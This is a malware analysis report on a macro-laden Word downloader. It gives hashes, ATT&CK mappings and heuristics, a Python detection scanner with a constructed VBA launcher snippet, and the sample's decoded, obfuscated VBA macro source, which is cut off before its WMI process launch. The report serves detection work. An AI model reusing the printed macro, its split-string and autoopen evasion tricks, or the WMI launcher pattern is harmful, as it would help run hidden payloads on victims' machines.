Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5aa042c4337f710c…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 151.0 KB
Created: 2019-05-08 06:44:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: a8d545e874a6beee088fa411fa9f575f
SHA-1: 2f1eb36bdc606ffba5eb7eeb497d901353e27f87
SHA-256: 5aa042c4337f710cdfbee3517a8f65cbe1d173bab103828cd3cff4deb3408eca
Risk score: 302

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1190 Exploit Public-Facing Application
Note: none of the findings below evidences T1190 (this is a user-opened document, not a network-facing service). The WMI Win32_Process.Create launch chain the findings describe maps to T1047 (Windows Management Instrumentation), which is not in the list above.

The sample contains VBA macros with an autoopen procedure, so the code runs as soon as the document is opened with macros enabled. The critical heuristics show the macro obtaining a WMI object via GetObject and using Win32_Process.Create to launch a process, a common way of starting a payload outside the Office process tree. The 'winmgmts' moniker is assembled from split string literals ("winmg" + "mts:"), which serves no purpose other than evading keyword scanning. Note also that the string built in X175321 (r1577825) is not a literal in the module source: it is assembled at run time from UserForm control properties (PasswordChar and ControlTipText of X_1667_4.Y168_96) and members of the v0402_8 form, so the decoded VBA alone does not reveal what is eventually executed; the form data has to be extracted as well. ClamAV independently classifies the file as a downloader (Doc.Downloader.Smpowloadbb-6965298-0).

Heuristics (8)

  • ClamAV detection (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Smpowloadbb-6965298-0
  • VBA macros detected (medium; 4 related findings) OLE_VBA_MACROS
    The document contains VBA macro code.
  • VBA WMI Win32_Process launcher (critical) OLE_VBA_WMI_PROCESS_CREATE
    The VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain; the WMI class name is often hidden through string concatenation or helper functions, and here the moniker is assembled from "winmg" + "mts:" and the GetObject result is passed through a helper (F765808) before use.
  • Dangerous API name reassembled from split string literals (critical) OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    The VBA concatenates short string literals that reassemble a dangerous API, ProgID or LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting a name across string concatenation serves no purpose other than evading keyword scanning; in this sample it is applied to the 'winmgmts' moniker.
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    The project defines an autoopen() procedure, written as "Sub _" with "autoopen()" on the following line (a line continuation that a naive single-line search for "Sub autoopen" would miss), so the code runs as soon as the document is opened with macros enabled.
  • GetObject call (high) OLE_VBA_GETOBJ
    GetObject is called on the reassembled WMI moniker.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. On its own this finding only evidences old Word macro execution surface, not a downloader or parser-CVE attribution. Its generic description assumes that no modern VBA project was recovered; in this sample one was (macros.bas, below), so the marker is redundant with OLE_VBA_AUTOOPEN rather than independent evidence.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label states which channel (macro, JS, link annotation, document body, ...) reached it.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace present in ordinary Office documents; it is not an indicator of compromise or a download location.
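The three macro findings above (split-literal reassembly, the WMI Win32_Process launch chain, and the line-continued autoopen) can be reproduced with a small scanner run over decoded VBA source. The block below is an added example written for this page; it is not the analysis platform's own heuristic code nor part of oletools, and its logic is a simplified re-implementation named after the report's tags. The two VBA snippets are constructed for the demonstration and are not the sample's own code.

```python
import re

# Constructed VBA snippets for demonstration (not the sample's own code).
# They mirror the patterns the report describes: an AutoOpen entry point
# written with a line continuation, a WMI moniker split across literals,
# the Win32_Process class name split across literals, and a .Create call.
SUSPECT_VBA = r'''
Sub _
autoopen()
On Error Resume Next
Set svc = GetObject("winmg" + "mts:" & "root\cimv2")
Set proc = svc.Get("Win32_" + "Process")
proc.Create cmdline, Null, Null, pid
End Sub
'''

BENIGN_VBA = r'''
Sub FormatReport()
    Dim greeting As String
    greeting = "Hello, " & "world"
    MsgBox greeting
End Sub
'''

# Names that are suspicious when they exist only after concatenation.
DANGEROUS_KEYWORDS = (
    "winmgmts", "win32_process", "wscript.shell",
    "scripting.filesystemobject", "powershell", "urldownloadtofile",
)

# One VBA string literal ("" is an escaped quote; literals never span lines).
STRING_LITERAL = re.compile(r'"((?:[^"\r\n]|"")*)"')
# Two or more literals joined by + or &, optionally across a "_" continuation.
CONCAT_RUN = re.compile(
    r'"(?:[^"\r\n]|"")*"(?:\s*[+&]\s*(?:_\s*\r?\n\s*)?"(?:[^"\r\n]|"")*")+'
)
# Auto-exec procedure header, tolerant of "Sub _<newline>autoopen()".
AUTOEXEC = re.compile(
    r'^\s*(?:public\s+|private\s+)?sub\s+(?:_\s*\r?\n\s*)?'
    r'(autoopen|auto_open|document_open|workbook_open)\b',
    re.I | re.M,
)

def reassemble_split_literals(vba):
    """Yield (joined_string, original_span) for every literal concatenation."""
    for m in CONCAT_RUN.finditer(vba):
        parts = STRING_LITERAL.findall(m.group(0))
        yield "".join(p.replace('""', '"') for p in parts), m.group(0)

def find_split_keywords(vba):
    """OLE_VBA_SPLIT_KEYWORD_OBFUSCATION-style check: a dangerous keyword that
    appears in a reassembled run but in no single literal of the source."""
    singles = {s.lower() for s in STRING_LITERAL.findall(vba)}
    hits = []
    for joined, span in reassemble_split_literals(vba):
        low = joined.lower()
        for kw in DANGEROUS_KEYWORDS:
            if kw in low and not any(kw in s for s in singles):
                hits.append((kw, span.strip()))
    return hits

def detect_wmi_process_create(vba):
    """OLE_VBA_WMI_PROCESS_CREATE-style check, evaluated after reassembly:
    GetObject on a winmgmts moniker, the Win32_Process class, and .Create."""
    text = vba
    for joined, span in reassemble_split_literals(vba):
        text = text.replace(span, '"' + joined + '"')
    low = text.lower()
    return ("getobject" in low and "winmgmts" in low
            and "win32_process" in low
            and re.search(r'\.\s*create\b', low) is not None)

def has_autoexec(vba):
    """OLE_VBA_AUTOOPEN-style check over the procedure headers."""
    return AUTOEXEC.search(vba) is not None

def scan(vba):
    """Combine the three checks into one finding dict for a macro source."""
    return {
        "autoexec": has_autoexec(vba),
        "split_keywords": find_split_keywords(vba),
        "wmi_process_create": detect_wmi_process_create(vba),
    }

if __name__ == "__main__":
    for name, src in (("suspect", SUSPECT_VBA), ("benign", BENIGN_VBA)):
        print(name, scan(src))
```

Run it against the decoded output of olevba to get the same three signals the report lists. Two design points matter in practice: keyword matching is done on the reassembled string and only counts when no single literal already contains the keyword, which is what makes the split-literal finding high-confidence rather than a plain string match; and the autoexec pattern accepts the "Sub _" continuation form used by this sample, which a line-oriented grep for "Sub autoopen" would miss. Strings built from UserForm control properties, as in this sample's X175321, are out of reach of this scanner by design and need the form data extracted separately.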

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7481 bytes
SHA-256: 3a94cea38ac5832469e3f3ff172f0d0192b144374d0cbf928a1090c20acd0c28

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "k81796"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "X_1667_4"
Attribute VB_Base = "0{A1E87136-6F6B-4B31-812F-75C8CB5D59ED}{5AC2E1ED-CF8A-4FA7-A059-6A1550D113CA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "a0146718"

Attribute VB_Name = "w6579506"

Attribute VB_Name = "Y10483"

Attribute VB_Name = "v0402_8"
Attribute VB_Base = "0{62271D62-2103-4E25-A76B-0E8D05BAE4FE}{07B30E92-0078-420E-88F7-EC430DD2DC45}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "d9813111"
Function F765808(z448983)
         While A77125 And u3720840
'u4436999X9602373A_3646X20045
'C9103528p91712s_19_1O2175153
'F6079722F0284166r19721n8495311
      Wend
         While i8897_4 And t_1_2249
'i4368296f272427f498264i72334
'U31795L8407_7l4082_4z165_48
'P000011_O77_8061O487369n1353366
      Wend
Set F765808 = CVar(z448983)
         While Q5033_11 And X3_352
'M9242211h7_9209P5932860J6_163
'A393216Q81163O56_78o91865
'Q9_31399G293840r07576N699035
      Wend
         While c7_5032 And d45411
'i_0158R45_46i596627I6109479
'w47207z848230O886533S27_03
'C4_4_0i075591N2477150K__015
      Wend
         While I6583_2 And q3823_43
'i80_92_1F5798664n_786_83i10090
'i640609w586157D3606905i9_031
'V069024a9773910m_7118t_756312
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While P1_5_150 And l8017977
'd74079a854255G76293D69805
'n488293T7557674A2205_8U98370
'm7_457i196135o4864963K849635
      Wend
         While F02275 And D92_83
'q2267054J_978792n333058j529723_
'O5039226b3616_r8223635J66865
'w15290N6_148F77234H_4_708
      Wend
         While j565939 And u181_03
'Q6667_f8631157P47568E32217
'V00297i2120_q6_370_T0_7670
'f79_6917h942194i76_1758G638158
      Wend
Call X175321
         While p212509 And j0707_5
'w7__0_90M44800_A503_4_4Q474373
'O1569444n_7778Q_8_88F7111852
'i02_8_71k9_7070R59__3P22766
      Wend
         While M79941_ And R_2609
'i68651z9230175s09_51a_9615
'K21_06P4954448u_67175V_58959
'S864698j12718v771679w08116
      Wend
         While V243__ And F278_24
'A46694N9906124S396076E_4_9157
'p7036834E6459_4W_197_9A9151799
'O08395i029902o0338854h597153
      Wend
End Sub


Attribute VB_Name = "j45_4318"
Function X175321()
On Error Resume Next
         While s660676 And A2670_68
'h_22_065O8102340T283572X1507288
'B135684b787305w95986u06857_3
'J936266o52_28f3348079u219406
      Wend
         While z084_956 And B575833
'd7308_17B2335_5V387160D863709
'A_5_38_5L353_989G40366p65632
'D6_178b47576t28823d07_5914
      Wend
         While J658423_ And E76__75
'r495749i4674_6z031753o5277779
'D956484Z4662_H994305S_9__66
't75_4302M_18236E0_16044a91541
      Wend
r1577825 = X_1667_4.Y168_96.PasswordChar + v0402_8.Q3_285 + X_1667_4.Y168_96 + v0402_8.Q7_611 + X_1667_4.Y168_96 + X_1667_4.Y168_96.PasswordChar + v0402_8.V68210 + X_1667_4.Y168_96.ControlTipText + X_1667_4.Y168_96.PasswordChar + v0402_8.r75_25 + X_1667_4.Y168_96.ControlTipText + v0402_8.a2_901_ + X_1667_4.Y168_96.ControlTipText
         While j57648_ And X43140
'L461767M429350_p4198490V5361_
'a___84X53_52_O26090i60179
'j551078s4889464o4492402f07_498
      Wend
         While Q13675 And w7188363
'T27338_f9802361z83964U4_0920
'b107785N9_523F9251_c719_7
'u1_465N6146_38A2__629E58180
      Wend
         While E323275 And q4188541
'N99856a74235o30_98_C5809687
'j469913f8182382Y799_4Y918619
'P52_69F196724o107667J0_2_032
      Wend
Set b2547_83 = F765808(GetObject("winmg" + "mts:
... (truncated)